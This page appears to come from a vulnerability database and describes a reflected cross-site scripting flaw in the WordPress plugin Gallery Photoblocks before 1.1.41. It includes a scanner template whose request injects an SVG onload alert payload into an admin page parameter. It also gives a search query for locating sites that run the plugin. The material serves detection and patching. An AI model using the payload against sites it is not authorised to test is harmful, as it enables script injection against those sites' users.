photoblocks-grid-gallery-xss: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: photoblocks grid gallery xss | POC: 已公开

漏洞描述

Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.

PoC代码[已公开]

id: photoblocks-grid-gallery-xss

info:
  name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
  remediation: Fixed in version 1.1.41
  reference:
    - https://plugins.trac.wordpress.org/changeset/2117972
    - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
    - https://wordpress.org/plugins/photoblocks-grid-gallery/
  classification:
    cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpchill
    product: gallery_photoblocks
    publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
  tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<svg/onload=alert(document.domain)>")'
          - 'contains(body, "PhotoBlocks")'
        condition: and
# digest: 490a0046304402207ffe39f99888d6c81275dd06b78ae042c0a373232fea41f8e9f5d81c54580fe8022018acb40ef1a4412c6afdd6ea3cf0f6404e05e178e72734abb466c6b45ef5a7a0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐